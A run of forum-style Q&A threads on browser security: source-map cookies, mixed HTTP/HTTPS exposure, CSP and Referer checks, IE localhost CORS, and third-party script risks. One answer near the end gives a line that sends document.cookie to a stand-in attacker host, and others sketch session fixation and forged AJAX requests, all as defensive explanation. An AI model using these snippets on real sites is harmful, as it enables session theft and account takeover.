Regarding source maps, I came across a strange behavior in Chromium (build 181620).
In my app I'm using minified jQuery, and after logging in I started seeing HTTP requests for "jquery.min.map" in the server log file. Those requests were lacking cookie headers (all other requests were fine).
Those requests are not even shown in the Network tab in Developer Tools (which doesn't bug me that much).
The point is, the JS files in this app are only supposed to be available to logged-in clients, so in this setup the source maps either won't work or I'd have to move the source map to a public directory.
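For reference, the browser finds the map through the sourceMappingURL comment at the end of the minified file, so moving the map to a public location would just mean changing that comment; the path below is made up for illustration:

// last line of jquery.min.js -- the public path here is purely illustrative
//# sourceMappingURL=//static.example.com/public-maps/jquery.min.map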
My question is: is this the desired behavior (meaning source map requests are not supposed to send cookies), or is it a bug in Chromium?
The String InspectorFrontendHost::loadResourceSynchronously(const String& url) implementation in InspectorFrontendHost.cpp, which is called for loading sourcemap resources, uses the DoNotAllowStoredCredentials flag, which I believe results in the behavior you are observing.
This method is potentially dangerous, so this flag is there for us (you) to be on the safe side and avoid leaking sensitive data.
As a side note, giving jquery.min.js out only to logged-in users (that is, not serving it from a cookieless domain) is not a very good idea in a production environment. I'm not sure about your reasoning behind this, but if you definitely need to avoid giving the file to clients not visiting your site, you may resort to checking the Referer HTTP request header.
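If you do go the Referer route, here is a minimal sketch of the idea, assuming a Node.js/Express front end (the framework, paths and host name are placeholders, not something taken from your setup):

// Minimal sketch, assuming Node.js with Express (hypothetical setup).
// Serve /js/* only when the Referer header points back at our own site.
const express = require('express');
const app = express();

app.use('/js', (req, res, next) => {
  const referer = req.get('Referer') || '';
  if (!referer.startsWith('https://www.example.com/')) {
    return res.sendStatus(403); // missing or foreign Referer: refuse the file
  }
  next();
});

app.use('/js', express.static('private/js')); // jquery.min.js lives here
app.listen(3000);

Keep in mind the Referer header is trivial to fake, so this only deters casual hotlinking, not a determined client.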
I encountered this problem and became curious as to why certain authentication cookies were not sent in requests for .js.map files to our application.
In my testing with Chrome 71.0.3578.98, if the SameSite cookie attribute is set to either strict or lax for a cookie, Chrome will not send that cookie when requesting the .js.map file. When there is no SameSite restriction, the cookie is sent.
I'm not aware of any specification of the intended behavior.
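To make the observed behavior concrete, a rough illustration (cookie names are invented): in that Chrome 71 test, only the cookie set without any SameSite attribute accompanied the .js.map request.

// Illustration only; cookie names are made up.
document.cookie = "auth=abc123; Secure; SameSite=Strict"; // not sent with the .js.map request
document.cookie = "pref=dark; Secure; SameSite=Lax";      // not sent with the .js.map request
document.cookie = "legacy=xyz789; Secure";                // sent with the .js.map request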
If I have an HTML page served over HTTP at http://example.com:123, and another served over HTTPS at https://example.com:456/some_app, is there any risk to the HTTPS app? Note that the following mitigations are assumed to be in place:
The HTTP page is entirely unauthenticated and contains public information
The cookies for the HTTPS page are marked secure
The HTTPS page uses a standard anti-CSRF pattern such as double submit
The main risk that I see is that an attacker could intercept the HTTP request and send back a page with malicious JavaScript. While this is undesirable, I can't see any way that the attack could escalate. Despite the overly permissive access controls on cookies, the attacker should not be able to steal the HTTPS page's cookies, because they are marked secure. As far as cross-origin requests go, requests made by the HTTP page are considered as coming from a different origin, so the CSRF protections work there.
Are there any attack vectors that I'm missing? Or is the HTTPS app reasonably safe?
The "secure" attribute of cookies prevents the cookies being sent with a http request so they are only sent with https. However there is nothing to prevent javascript on the http page reading the cookie if, for example, it has been tampered with either in transit to include extra javascript or was vulnerable to a XSS flaw.
This could be remediated by setting the HttpOnly flag as well as the secure flag but that will may not work for your Double protection CSRF implementation if JavaScript is needed to read the cookie.
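For context, a minimal sketch of the double-submit pattern (cookie, header and endpoint names here are invented): the page script reads the CSRF cookie and repeats it in a request header, which is exactly why that particular cookie cannot be HttpOnly.

// Sketch only; names are illustrative, not from the question.
function readCookie(name) {
  var match = document.cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));
  return match ? decodeURIComponent(match[1]) : null;
}

var xhr = new XMLHttpRequest();
xhr.open('POST', '/api/transfer', true);                  // hypothetical endpoint
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.setRequestHeader('X-CSRF-Token', readCookie('csrf')); // server compares header with cookie
xhr.send('amount=10');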
EDIT: Comments below state that Chrome (at least) prevents this when the Secure flag is set, but I cannot see this explicitly called out in the RFC; in fact, section 8.5 states that cookies do not always follow the same restrictions for scheme and path when accessed through document.cookie. It also gives the example of path restrictions being ignored when accessed locally using document.cookie, though admittedly it doesn't explicitly say whether Secure cookies can be read from JavaScript on non-HTTPS pages. I would err on the cautious side and assume they are not safe from JavaScript on HTTP pages unless the HttpOnly flag is set.
The other issue is that there is nothing to stop the HTTP page from setting the cookie and overwriting the existing one. Again, this could be achieved by intercepting the HTTP page response and adding a Set-Cookie header, or by using JavaScript on a page vulnerable to XSS. While you might think overwriting a cookie wouldn't cause too many problems, it could, for example, log you in as someone else without you realising, at which point you might enter other private data under this incorrect login.
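As a rough sketch of that last point (noting that recent browsers have added some protections here, such as refusing to let a non-secure origin clobber an existing Secure cookie): script injected into the HTTP page can plant a cookie that the HTTPS app on the same host will receive, because cookies are not isolated by port, and a non-Secure cookie written over HTTP is still sent over HTTPS.

// Session-fixation sketch from the intercepted HTTP page; values are invented.
// The HTTPS app at example.com:456 may receive this cookie on later requests.
document.cookie = "session=attacker-chosen-value; path=/; domain=example.com";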
Of course your HTTPS page could also be vulnerable to XSS, but the interception attacks mentioned are only an issue on unsecured HTTP (and I'm including poorly configured HTTPS in that, by the way). Additionally, HTTP pages are typically handled with less care by users and developers alike, and they load insecure third-party content without error, so they could be more vulnerable to XSS or other issues.
That's without mentioning the fact that, with only a port number difference, your HTTP site could be intercepted and made to look like your HTTPS site as a phishing page, in the hope that your visitors are happy with the server name and don't notice the incorrect port.
And those are just a few issues I can think of.
I would strongly advise against allowing both HTTP and HTTPS on the same server name, would suggest HTTPS everywhere, and would even go as far as recommending HSTS to enforce this.
I have some HTML/PHP pages that include javascript calls.
Those calls point to JS/PHP methods included in a library (PIWIK) stored on a remote server.
They are triggered using an http://www.domainname.com/ prefix to point to the correct files.
I cannot modify the source code of the library.
When my own HTML/PHP pages are previewed locally in a browser (I mean using a c:\xxxx kind of path, not a localhost://xxxx one), the remote scripts are still called and do their processing.
I don't want this to happen; those scripts should only execute if they are called from a www.domainname.com page.
Can you help me secure this?
One can for sure bypass this protection by modifying the web pages on the fly with some browser add-on while browsing the real web site, but that is a little bit harder to achieve.
I've opened an issue on the PIWIK issue tracker, but I would like to secure and protect my web site and the corresponding statistics from this issue as soon as possible, while waiting for a future Piwik update.
EDIT
The process I'd like to put in place would be:
Someone opens a page from anywhere other than www.domainname.com
> this page calls a JS method on a remote server (or not, it may be copied locally),
> this script calls a PHP script on the remote server
> the PHP script says "hey, where the hell are you calling me from? Go to hell!", or the PHP script simply does not execute...
I've tried to play with .htaccess for that, but since any JS script must be delivered to the client, it also blocks the legitimate calls from www.domainname.com.
Untested, but I think you can use php_sapi_name() or the PHP_SAPI constant to detect the interface PHP is using, and do logic accordingly.
Not wanting to sound cheeky, but your situation sounds rather scary and I would advise searching for some PHP configuration best practices regarding security ;)
Edit after the question has been amended twice:
Now the problem is clearer. But you will struggle to secure this if the JavaScript and PHP are not on the same server.
If they are not on the same server, you will be reliant on HTTP headers (like the Referer or Origin header) which are fakeable.
But PIWIK already tracks the referrer ("Piwik uses first-party cookies to keep track of some information (number of visits, original referrer, and unique visitor ID)"), so you can discount hits from invalid referrers.
If that is not enough, the standard way of being sure that a request to a web service comes from a verified source is to use a standard Cross-Site Request Forgery prevention technique: a CSRF "token", sometimes also called a "crumb" or "nonce". As this is analytics software, I would be surprised if PIWIK does not do this already, if it is possible with their architecture. I would ask them.
Most web frameworks these days have CSRF token generators and APIs you should be able to make use of; it's not hard to make your own, but if you cannot amend the JS you will have problems passing the token around. Again, the PIWIK JS API may have methods for passing session IDs and similar data around.
Original answer
This can be accomplished with a Content Security Policy to restrict the domains that scripts can be called from:
CSP defines the Content-Security-Policy HTTP header that allows you to create a whitelist of sources of trusted content, and instructs the browser to only execute or render resources from those sources.
Therefore, you can set the script policy to 'self' to only allow scripts from your current origin (the filing system) to be executed. Any remote ones will not be allowed.
Normally this would only be available from a source where you can set HTTP headers, but as you are running from the local filing system this is not possible. However, you may be able to get around this with the http-equiv <meta> tag:
Authors who are unable to support signaling via HTTP headers can use tags with http-equiv="X-Content-Security-Policy" to define their policies. HTTP header-based policy will take precedence over tag-based policy if both are present.
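For example (the exact tag below is just an illustration, and note that current browsers have since settled on the unprefixed name), a tag along the lines of <meta http-equiv="Content-Security-Policy" content="script-src 'self'"> in the page's head would tell the browser to execute only scripts coming from the page's own origin and to refuse the remote Piwik script.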
Answer after question edit
Look into the Referer or Origin HTTP headers. Referer is available for most requests; however, it is not sent from HTTPS pages to HTTP resources, and if the user has a proxy or privacy plugin installed it may strip this header.
Origin is only available for XHR requests made cross-domain (or even same-domain in some browsers).
You will be able to check that these headers contain your domain where you will want the scripts to be called from. See here for how to do this with htaccess.
At the end of the day this doesn't make it secure, but, as you say in your own words, it will make it "a little bit harder to achieve".
The Very Short Version: is anybody successfully requesting local resources via AJAX, in IE, over SSL? I cannot solve getting an "access denied" error.
The Longer Version:
I am using AJAX to retrieve JSON from an application that runs a local web service. The web service channel is encrypted so that if the remote site is being served over HTTPS, no "insecure resource on a secure page" errors appear.
So, in the address bar is a remote site of some sort... mysite.com. It is receiving information from https://localhost/.
The web service is setting the correct headers for CORS and everything works in Chrome and Firefox. In IE, if I put my https://localhost resource into the address bar, the correct resource is returned and displayed. However, when using AJAX (rather than the address bar), a security setting in IE denies access. This is documented (in part) here:
Access denied in IE 10 and 11 when ajax target is localhost
The only proper solution, offered in one reply, is to add the requesting domain (mysite.com in this case) to the trusted sites. This works, but we would prefer not to require user intervention... pointing to a knowledge base article on how to add a trusted site is hardly a great user experience. The other replies to that question are invalid for the same reasons as below.
Some more stumbling around and I discovered this:
CORS with IE, XMLHttpRequest and ssl (https)
Which had a reply containing a wrapper for AJAX requests in IE. It seemed promising, but as it turns out, IE11 has now deprecated the XDomainRequest API. This was probably the right thing for Microsoft to do... but now the "hack" workaround of adding a void onProgress handler to the XDR object is obviously not an option and the once-promising workaround wrapper is rendered null and void.
Has anybody come across either:
a) a way to get those requests through without needing to modify the trusted sites in IE? In other words, an updated version of the workaround in the second link?
b) as a "next best" case: a way to prompt the user to add the site to their trusted zone? "mysite.com wishes to be added to your trusted zones. Confirm Yes/No" and have it done, without them actually needing to open up their native settings dialogues and doing it manually?
For security reasons, Internet Explorer's XDomainRequest object blocks access (see #6 here) to the Intranet Zone from the Internet Zone. I would not be surprised to learn that this block was ported into the IE10+ CORS implementation for the XMLHTTPRequest object.
One approach which may help is to simply change from localhost to 127.0.0.1 as the latter is treated as Internet Zone rather than Intranet Zone and as a consequence the zone-crossing is avoided.
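In practice the change on the calling page is just the host name in the URL; a sketch follows (the endpoint path is hypothetical, and the local service must still send matching CORS headers such as Access-Control-Allow-Origin and, if cookies are involved, Access-Control-Allow-Credentials):

// Sketch of the workaround: request 127.0.0.1 instead of localhost.
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://127.0.0.1/api/data', true); // hypothetical endpoint
xhr.withCredentials = true;                          // only if the local service expects cookies
xhr.onload = function () { console.log(JSON.parse(xhr.responseText)); };
xhr.send();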
However, you should be aware that Internet Explorer 10+ will block all access to the local computer (via any address) when a site is running in Enhanced Protected Mode (EPM)-- see "Loopback blocked" in this post. Currently, IE uses EPM only for Internet sites when run in the Metro/Immersive browsing mode (not in Desktop) but this could change in the future.
No, there's no mechanism to show the Zones-Configuration UI from JavaScript or to automatically move a site from one zone to another. However, the fact that you have a local server implies that you are running code on the client already, which means you could use the appropriate API to update the Zone Mapping on the client. Note that such a change requires that you CLEARLY obtain user permission first, lest your installer be treated as malware by Windows Defender and other security products.
So, in summary, using the IP address should serve as a workaround for many, but not all platforms.
Since those are two different domains, one solution would be to create an application which proxies the requests in the direction you want.
If you have control over the example.com end, and want to support users who bring their own localhost service, this would be harder, as you would have to provide more requirements for what they bring.
If however, you have control over what runs in localhost, and want to access example.com, and have it access the localhost service, set up redirection in your web server of preference, or use a reverse proxy. You could add an endpoint to the same localhost app which doesn't overlap paths, for example, route http://localhost/proxy/%1 to http://%1, leaving the rest of localhost alone. Or, run a proxy on e.g. http://localhost:8080 which performs a similar redirection, and can serve example.com from a path, and the API from another.
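A minimal sketch of that localhost-side proxy, assuming Node.js and plain HTTP (the port, the path scheme and the absence of TLS handling are all simplifications, not a drop-in solution):

// Requests to http://localhost:8080/proxy/<host>/<path> are forwarded to
// http://<host>/<path>; anything else gets a 404 here, but could be served locally.
const http = require('http');

http.createServer((clientReq, clientRes) => {
  const match = clientReq.url.match(/^\/proxy\/([^/]+)(\/.*)?$/);
  if (!match) {
    clientRes.writeHead(404);
    return clientRes.end('Not proxied');
  }
  const [, targetHost, targetPath = '/'] = match;

  const upstream = http.request(
    { host: targetHost, path: targetPath, method: clientReq.method, headers: { host: targetHost } },
    (upstreamRes) => {
      clientRes.writeHead(upstreamRes.statusCode, upstreamRes.headers);
      upstreamRes.pipe(clientRes); // stream the upstream response back to the caller
    }
  );
  upstream.on('error', () => {
    if (!clientRes.headersSent) clientRes.writeHead(502);
    clientRes.end();
  });
  clientReq.pipe(upstream); // forward any request body
}).listen(8080);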
This winds up being a type of "glue" or integration code, which should allow you to mock interactions up to a point.
I'm writing a web app in JavaScript which needs to access a third-party API (located on x.apisite.com and y.apisite.com). I was using XMLHttpRequest, but when serving the files from my own local server, this fails because of the same-origin policy.
Now, this web app is supposed to be installed on my mobile device, where any downloaded files will be cached. So, I changed my DNS entries to point x.apisite.com and y.apisite.com to my own local server, downloaded the files, and then changed the DNS entries back to the correct ones. I thought that since the browser thinks the scripts were downloaded from *.apisite.com, I could now make XMLHttpRequests to *.apisite.com. However, this does not seem to be the case; I still get same-origin policy errors.
What am I doing wrong?
Here's the basic idea of what I'm doing:
<!DOCTYPE html>
<html>
<head>
<!-- this will actually be downloaded from my own local server -->
<script src="http://x.apisite.com/script-0.js">
<script src="http://y.apisite.com/script-1.js">
...
In script-0.js, I make an XMLHttpRequest to x.apisite.com, and likewise in script-1.js, I access y.apisite.com.
Practical answer (not recommended): Create CNAME records to the third-party domains from domains that you control, then use those domains and hope that the hosts of the third-party aren't looking at the HTTP Host header. Note that this wouldn't work if the clients attempt to authenticate the third-party hosts either; for example when using HTTPS (some client browsers may force the use of HTTPS in certain scenarios).
Ideal answer: Ask the third-party to authorize requests made by code that came from your origin domain using CORS (some hosts already allow requests from code from any origin, you should check that).
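For reference, "authorize requests from your origin" boils down to the third-party endpoints answering with CORS response headers along these lines (a Node.js sketch purely to show the headers; it is obviously not the third party's actual code, and the exact values depend on whether credentials are involved):

const http = require('http');
http.createServer(function (req, res) {
  // The origin of YOUR site, i.e. where the calling code was loaded from.
  res.setHeader('Access-Control-Allow-Origin', 'https://www.yoursite.example');
  res.setHeader('Access-Control-Allow-Methods', 'GET, POST');
  res.setHeader('Access-Control-Allow-Headers', 'Content-Type');
  res.setHeader('Content-Type', 'application/json');
  res.end(JSON.stringify({ ok: true }));
}).listen(8080);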
Alternative: If the third-party doesn't want to give clients the go-ahead to make cross-origin requests with code from your domain, then you have to make those requests yourself (from your server). The code you send to the client browsers will then only interact with the same origin, but this also means that users will have to trust you with their credentials if you're proxying requests for them (if that's relevant), or you must have credentials of your own to authenticate your server to the third-party hosts, which allow you to do whatever it is you want to do there. It also means you take the traffic load as well, which may or may not be heavy depending on the application. There are potentially many other implications, which all derive from the fact that you explicitly take responsibility for these requests.
Note: While this may sound a bit complicated, it may be useful to understand the trust mechanics between the user, the user's client browser, the code executing in the browser, the origin of that code, and the domains to which that code makes requests. Always keep the best interests of each party in mind and it'll be easy to find a solution for your specific problem.
Final answer (everybody hates it, but you probably expected it): "It depends on what exactly you're trying to do." (Sorry.)
Meaning if I have a website and I link to an external .js file, say for jQuery or some widget service, they can pretty easily just pull my authentication cookie and then log in as me, correct?
What if I am under SSL?
If you include Javascript or JSONP code from another domain, that code has full client-side power and can do whatever it wants.
It can send AJAX requests to automatically make your user do things, and it can steal document.cookie.
If your authentication cookies are HTTP-only, it can't steal them, but it can still impersonate the user using AJAX.
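A minimal sketch of what "impersonate the user using AJAX" means (the endpoint below is invented): the injected script never sees an HttpOnly cookie, but the browser still attaches it to same-origin requests the script makes.

// Hypothetical endpoint; the auth cookie rides along automatically
// even though document.cookie cannot read it.
var xhr = new XMLHttpRequest();
xhr.open('POST', '/account/change-email', true);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({ email: 'attacker@evil.example' }));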
Never include a JS file from a domain you don't trust.
If your page uses SSL, all JavaScript files must also be loaded over SSL, or an attacker can modify the un-encrypted JavaScript to do whatever he wants.
For this reason, browsers will show a security warning if an SSL page uses non-SSL resources.
Note that JSONP is no exception to this rule.
Any JSONP response has full access to your DOM.
If security is a concern, do not use untrusted JSONP APIs.
I can only agree with SLaks and Haochi (+1 and all).
It is extremely insecure and you should never do it even if you trust the domain. Don't trust the answers that tell you that this is not the case because they are just wrong.
This is why literally all of the links to JavaScript libraries hosted on Google's CDN in the Developer's Guide to the Google Libraries API are now secure HTTPS links, even though encrypting all of that traffic means a huge overhead even for Google.
They used to recommend using HTTPS only for websites that use HTTPS themselves, now there are no HTTP links in the examples at all.
The point is that you can trust Google and their CDN, but you can never trust the local DNS and routers in some poor schmuck's cafe from which your visitors may be connecting to your website, and Google's CDN is a great target for obvious reasons.
It depends on what you mean by "pull". As others have said here, cookies are only sent to the domain they originated from. However, a third-party file (with malicious intent) can still send your cookies back to its server by executing some JavaScript code like
// e.g. sneak the (non-HttpOnly) cookies out via an image request
new Image().src = "http://badguy.tld/?" + encodeURIComponent(document.cookie);
So, only include scripts from trusted sources (Google, Facebook, etc.)
No, because cookies for your site will only be sent to your domain.
For example, when your browser sees yoursite.com it will send the authentication cookie for yoursite.com. If it also has to make a different request for jQuery (for the .js script), it won't send the cookie for yoursite.com (but it will send a cookie for the jQuery host, assuming one exists).
Remember, every resource is a separate request under HTTP.
I am not sure HttpOnly is fully supported across all browsers, so I wouldn't trust it to prevent attacks by itself.
If you're worried about a 3rd party attacker (i.e., not the site offering the JS file) grabbing the cookies, definitely use SSL and secure cookies.
If your page isn't running on SSL, using HttpOnly cookies doesn't actually prevent a man-in-the-middle attack, since an attacker in the middle can intercept the cookies regardless by just pretending to be your domain.
If you don't trust the host of an external .js file, don't use the external .js file. An external js file can rewrite the entire page DOM to ask for a CC to be submitted to anyone and have it look (to an average user) the same as your own page, so you're pretty much doomed if you're getting malicious .js files. If you're not sure if a .js host is trustworthy, host a copy of it locally (and check the file for security holes) or don't use it at all. Generally I prefer the latter.
In the specific case of JQuery, just use the copy on Google's CDN if you can't find a copy you like better.
Cookies are domain-specific, guarded by the same-origin policy.